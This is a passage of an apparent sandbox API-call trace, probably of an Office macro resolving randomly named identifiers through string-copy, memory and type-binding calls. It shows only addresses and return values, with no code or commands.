(in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5570c56 | out: _Dst=0x343ddc) returned 0x0 [0060.929] CRetailMalloc_Free () returned 0x7940201 [0060.929] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x5570c7a | out: _Dst=0x87504e0) returned 0x0 [0060.929] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5570c7a | out: _Dst=0x343ddc) returned 0x0 [0060.929] CRetailMalloc_Free () returned 0x1a060101 [0060.930] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x5570ca2 | out: _Dst=0x87fcc50) returned 0x0 [0060.930] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5570ca2 | out: _Dst=0x343ddc) returned 0x0 [0060.930] CRetailMalloc_Free () returned 0x7940201 [0060.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5570cc6, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="cQCz5Z0") returned 8 [0060.930] ITypeComp:RemoteBind (in: This=0x87ce890, szName="cQCz5Z0", lHashVal=0x10a377, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x5e0 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x5e0) returned 0x0 [0060.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5570cc6, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="cQCz5Z0") returned 8 [0060.930] ITypeComp:RemoteBind (in: This=0x87ce668, szName="cQCz5Z0", lHashVal=0x10a377, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x5e0 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x5e0) returned 0x0 [0060.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5570cc6, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="cQCz5Z0") returned 8 [0060.930] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="cQCz5Z0", lHashVal=0x10a377, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x5e0 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x5e0) returned 0x0 [0060.931] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x5570cc6 | out: _Dst=0x87fcc50) returned 0x0 [0060.931] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5570cc6 | out: _Dst=0x343ddc) returned 0x0 [0060.931] CRetailMalloc_Free () returned 0x7940201 [0060.931] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x5570cea | out: _Dst=0x87fcc50) returned 0x0 [0060.931] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5570cea | out: _Dst=0x343ddc) returned 0x0 [0060.931] CRetailMalloc_Free () returned 0x7940201 [0060.932] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x5570d0e | out: _Dst=0x87fcc50) returned 0x0 [0060.932] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5570d0e | out: _Dst=0x343ddc) returned 0x0 [0060.932] CRetailMalloc_Free () returned 0x7940201 [0060.933] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x5570d32 | out: _Dst=0x87fcc50) returned 0x0 [0060.933] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x5570d32 | out: _Dst=0x343ddc) returned 0x0 [0060.933] CRetailMalloc_Free () returned 0x7940201 [0060.933] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x5570d5a | out: _Dst=0x87504e0) returned 0x0 [0060.933] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5570d5a | out: _Dst=0x343ddc) returned 0x0 [0060.933] CRetailMalloc_Free () returned 0x1a060101 [0060.934] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x5570d82 | out: _Dst=0x87fcc50) returned 0x0 [0060.934] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5570d82 | out: _Dst=0x343ddc) returned 0x0 [0060.934] CRetailMalloc_Free () returned 0x7940201 [0060.934] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x5570da6 | out: _Dst=0x87504e0) returned 0x0 [0060.934] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5570da6 | out: _Dst=0x343ddc) returned 0x0 [0060.934] CRetailMalloc_Free () returned 0x1a060101 [0060.934] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x5570dce | out: _Dst=0x87fcc50) returned 0x0 [0060.935] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5570dce | out: _Dst=0x343ddc) returned 0x0 [0060.935] CRetailMalloc_Free () returned 0x7940201 [0060.936] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x5570df2 | out: _Dst=0x87fcc50) returned 0x0 [0060.936] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5570df2 | out: _Dst=0x343ddc) returned 0x0 [0060.936] CRetailMalloc_Free () returned 0x7940201 [0060.937] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x5570e16 | out: _Dst=0x87fcc50) returned 0x0 [0060.937] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5570e16 | out: _Dst=0x343ddc) returned 0x0 [0060.937] CRetailMalloc_Free () returned 0x7940201 [0060.937] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x5570e3a | out: _Dst=0x87fcc50) returned 0x0 [0060.937] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5570e3a | out: _Dst=0x343ddc) returned 0x0 [0060.937] CRetailMalloc_Free () returned 0x7940201 [0060.938] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x5570e5e | out: _Dst=0x87fcc50) returned 0x0 [0060.938] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5570e5e | out: _Dst=0x343ddc) returned 0x0 [0060.938] CRetailMalloc_Free () returned 0x7940201 [0060.938] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x5570e82 | out: _Dst=0x87fcc50) returned 0x0 [0060.938] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x5570e82 | out: _Dst=0x343ddc) returned 0x0 [0060.938] CRetailMalloc_Free () returned 0x7940201 [0060.939] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x5570eaa | out: _Dst=0x87504e0) returned 0x0 [0060.939] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5570eaa | out: _Dst=0x343ddc) returned 0x0 [0060.939] CRetailMalloc_Free () returned 0x1a060101 [0060.939] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x5570ed2 | out: _Dst=0x87fcc50) returned 0x0 [0060.939] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x5570ed2 | out: _Dst=0x343ddc) returned 0x0 [0060.939] CRetailMalloc_Free () returned 0x7940201 [0060.940] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x5570efa | out: _Dst=0x87fcc50) returned 0x0 [0060.940] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5570efa | out: _Dst=0x343ddc) returned 0x0 [0060.940] CRetailMalloc_Free () returned 0x7940201 [0060.940] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x5570f1e | out: _Dst=0x87fcc50) returned 0x0 [0060.940] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5570f1e | out: _Dst=0x343ddc) returned 0x0 [0060.940] CRetailMalloc_Free () returned 0x7940201 [0060.941] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x5570f42 | out: _Dst=0x87fcc50) returned 0x0 [0060.941] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5570f42 | out: _Dst=0x343ddc) returned 0x0 [0060.941] CRetailMalloc_Free () returned 0x7940201 [0060.941] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x5570f8e | out: _Dst=0x87fcc50) returned 0x0 [0060.941] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5570f8e | out: _Dst=0x343ddc) returned 0x0 [0060.941] CRetailMalloc_Free () returned 0x7940201 [0060.942] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x5570f66 | out: _Dst=0x87504e0) returned 0x0 [0060.942] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5570f66 | out: _Dst=0x343ddc) returned 0x0 [0060.942] CRetailMalloc_Free () returned 0x1a060101 [0060.942] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x5570fb2 | out: _Dst=0x87504e0) returned 0x0 [0060.942] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5570fb2 | out: _Dst=0x343ddc) returned 0x0 [0060.942] CRetailMalloc_Free () returned 0x1a060101 [0060.943] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x5570fda | out: _Dst=0x87fcc50) returned 0x0 [0060.943] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x5570fda | out: _Dst=0x343ddc) returned 0x0 [0060.943] CRetailMalloc_Free () returned 0x7940201 [0060.943] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x5571002 | out: _Dst=0x87fcc50) returned 0x0 [0060.943] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5571002 | out: _Dst=0x343ddc) returned 0x0 [0060.943] CRetailMalloc_Free () returned 0x7940201 [0060.944] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x5571026 | out: _Dst=0x87504e0) returned 0x0 [0060.944] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5571026 | out: _Dst=0x343ddc) returned 0x0 [0060.944] CRetailMalloc_Free () returned 0x1a060101 [0060.944] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x557104e | out: _Dst=0x87fcc50) returned 0x0 [0060.944] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x557104e | out: _Dst=0x343ddc) returned 0x0 [0060.944] CRetailMalloc_Free () returned 0x7940201 [0060.945] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x5571076 | out: _Dst=0x87fcc50) returned 0x0 [0060.945] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x5571076 | out: _Dst=0x343ddc) returned 0x0 [0060.945] CRetailMalloc_Free () returned 0x7940201 [0060.945] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x557109e | out: _Dst=0x87fcc50) returned 0x0 [0060.945] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x557109e | out: _Dst=0x343ddc) returned 0x0 [0060.945] CRetailMalloc_Free () returned 0x7940201 [0060.946] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x55710c6 | out: _Dst=0x87fcc50) returned 0x0 [0060.946] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x55710c6 | out: _Dst=0x343ddc) returned 0x0 [0060.946] CRetailMalloc_Free () returned 0x7940201 [0060.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55710ea, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="UPUBLy8") returned 8 [0060.946] ITypeComp:RemoteBind (in: This=0x87ce890, szName="UPUBLy8", lHashVal=0x102d26, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x618 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x618) returned 0x0 [0060.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55710ea, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="UPUBLy8") returned 8 [0060.946] ITypeComp:RemoteBind (in: This=0x87ce668, szName="UPUBLy8", lHashVal=0x102d26, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x618 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x618) returned 0x0 [0060.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55710ea, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="UPUBLy8") returned 8 [0060.947] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="UPUBLy8", lHashVal=0x102d26, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x618 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x618) returned 0x0 [0060.947] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x55710ea | out: _Dst=0x87fcc50) returned 0x0 [0060.947] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x55710ea | out: _Dst=0x343ddc) returned 0x0 [0060.947] CRetailMalloc_Free () returned 0x7940201 [0060.947] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x557110e | out: _Dst=0x87fcc50) returned 0x0 [0060.948] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x557110e | out: _Dst=0x343ddc) returned 0x0 [0060.948] CRetailMalloc_Free () returned 0x7940201 [0060.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5571132, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="T9xNk0e") returned 8 [0060.948] ITypeComp:RemoteBind (in: This=0x87ce890, szName="T9xNk0e", lHashVal=0x10cb21, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x61c | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x61c) returned 0x0 [0060.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5571132, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="T9xNk0e") returned 8 [0060.948] ITypeComp:RemoteBind (in: This=0x87ce668, szName="T9xNk0e", lHashVal=0x10cb21, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x61c | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x61c) returned 0x0 [0060.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5571132, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="T9xNk0e") returned 8 [0060.948] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="T9xNk0e", lHashVal=0x10cb21, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x61c | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x61c) returned 0x0 [0060.948] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x5571132 | out: _Dst=0x87fcc50) returned 0x0 [0060.949] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5571132 | out: _Dst=0x343ddc) returned 0x0 [0060.949] CRetailMalloc_Free () returned 0x7940201 [0060.949] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x5571156 | out: _Dst=0x87fcc50) returned 0x0 [0060.949] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5571156 | out: _Dst=0x343ddc) returned 0x0 [0060.949] CRetailMalloc_Free () returned 0x7940201 [0060.949] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x557117a | out: _Dst=0x87fcc50) returned 0x0 [0060.950] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x557117a | out: _Dst=0x343ddc) returned 0x0 [0060.950] CRetailMalloc_Free () returned 0x7940201 [0060.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55711a2, cbMultiByte=9, lpWideCharStr=0x343d64, cchWideChar=10 | out: lpWideCharStr="cHX4h7D3") returned 9 [0060.950] ITypeComp:RemoteBind (in: This=0x87ce890, szName="cHX4h7D3", lHashVal=0x1000b8, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x622 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x622) returned 0x0 [0060.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55711a2, cbMultiByte=9, lpWideCharStr=0x343d64, cchWideChar=10 | out: lpWideCharStr="cHX4h7D3") returned 9 [0060.950] ITypeComp:RemoteBind (in: This=0x87ce668, szName="cHX4h7D3", lHashVal=0x1000b8, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x622 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x622) returned 0x0 [0060.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55711a2, cbMultiByte=9, lpWideCharStr=0x343d64, cchWideChar=10 | out: lpWideCharStr="cHX4h7D3") returned 9 [0060.950] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="cHX4h7D3", lHashVal=0x1000b8, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x622 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x622) returned 0x0 [0060.950] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x55711a2 | out: _Dst=0x87fcc50) returned 0x0 [0060.951] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x55711a2 | out: _Dst=0x343ddc) returned 0x0 [0060.951] CRetailMalloc_Free () returned 0x7940201 [0060.951] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x55711ca | out: _Dst=0x87fcc50) returned 0x0 [0060.951] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x55711ca | out: _Dst=0x343ddc) returned 0x0 [0060.951] CRetailMalloc_Free () returned 0x7940201 [0060.953] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x55711ee | out: _Dst=0x87fcc50) returned 0x0 [0060.953] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x55711ee | out: _Dst=0x343ddc) returned 0x0 [0060.953] CRetailMalloc_Free () returned 0x7940201 [0060.953] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x5571216 | out: _Dst=0x87fcc50) returned 0x0 [0060.953] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5571216 | out: _Dst=0x343ddc) returned 0x0 [0060.953] CRetailMalloc_Free () returned 0x7940201 [0060.954] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x557123a | out: _Dst=0x87fcc50) returned 0x0 [0060.954] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x557123a | out: _Dst=0x343ddc) returned 0x0 [0060.954] CRetailMalloc_Free () returned 0x7940201 [0060.954] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x557125e | out: _Dst=0x87fcc50) returned 0x0 [0060.954] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x557125e | out: _Dst=0x343ddc) returned 0x0 [0060.954] CRetailMalloc_Free () returned 0x7940201 [0060.954] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x5571286 | out: _Dst=0x87fcc50) returned 0x0 [0060.955] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5571286 | out: _Dst=0x343ddc) returned 0x0 [0060.955] CRetailMalloc_Free () returned 0x7940201 [0060.955] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x55712aa | out: _Dst=0x87fcc50) returned 0x0 [0060.955] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x55712aa | out: _Dst=0x343ddc) returned 0x0 [0060.955] CRetailMalloc_Free () returned 0x7940201 [0060.956] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x55712ce | out: _Dst=0x87504e0) returned 0x0 [0060.956] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x55712ce | out: _Dst=0x343ddc) returned 0x0 [0060.956] CRetailMalloc_Free () returned 0x1a060101 [0060.956] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x55712f6 | out: _Dst=0x87fcc50) returned 0x0 [0060.956] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x55712f6 | out: _Dst=0x343ddc) returned 0x0 [0060.956] CRetailMalloc_Free () returned 0x7940201 [0060.957] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x557131a | out: _Dst=0x87504e0) returned 0x0 [0060.957] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x557131a | out: _Dst=0x343ddc) returned 0x0 [0060.957] CRetailMalloc_Free () returned 0x1a060101 [0060.957] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x5571342 | out: _Dst=0x87fcc50) returned 0x0 [0060.957] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5571342 | out: _Dst=0x343ddc) returned 0x0 [0060.957] CRetailMalloc_Free () returned 0x7940201 [0060.958] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x557138a | out: _Dst=0x87fcc50) returned 0x0 [0060.958] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x557138a | out: _Dst=0x343ddc) returned 0x0 [0060.958] CRetailMalloc_Free () returned 0x7940201 [0060.958] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x5571366 | out: _Dst=0x87fcc50) returned 0x0 [0060.958] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea201a, cbMultiByte=15, lpWideCharStr=0x343d74, cchWideChar=16 | out: lpWideCharStr="_B_var_BryKdb5") returned 15 [0060.959] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_BryKdb5", lHashVal=0x107f9b, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.959] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5571366 | out: _Dst=0x343ddc) returned 0x0 [0060.959] CRetailMalloc_Free () returned 0x7940201 [0060.959] CRetailMalloc_Realloc () returned 0x6210680 [0060.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55713d6, cbMultiByte=9, lpWideCharStr=0x343d64, cchWideChar=10 | out: lpWideCharStr="LVlizxYo") returned 9 [0060.960] ITypeComp:RemoteBind (in: This=0x87cef08, szName="LVlizxYo", lHashVal=0x10e53e, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x640 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x640) returned 0x0 [0060.961] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.961] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x55713d6 | out: _Dst=0x87fcc50) returned 0x0 [0060.961] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea2046, cbMultiByte=16, lpWideCharStr=0x343d74, cchWideChar=17 | out: lpWideCharStr="_B_var_LVlizxYo") returned 16 [0060.961] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_LVlizxYo", lHashVal=0x10bcc7, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.961] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x55713d6 | out: _Dst=0x343ddc) returned 0x0 [0060.961] CRetailMalloc_Free () returned 0x7940201 [0060.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55713fe, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="rc9Dfw") returned 7 [0060.962] ITypeComp:RemoteBind (in: This=0x87cef08, szName="rc9Dfw", lHashVal=0x10df8e, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x642 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x642) returned 0x0 [0060.962] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.962] _mbscpy_s (in: _Dst=0x87fcc50, 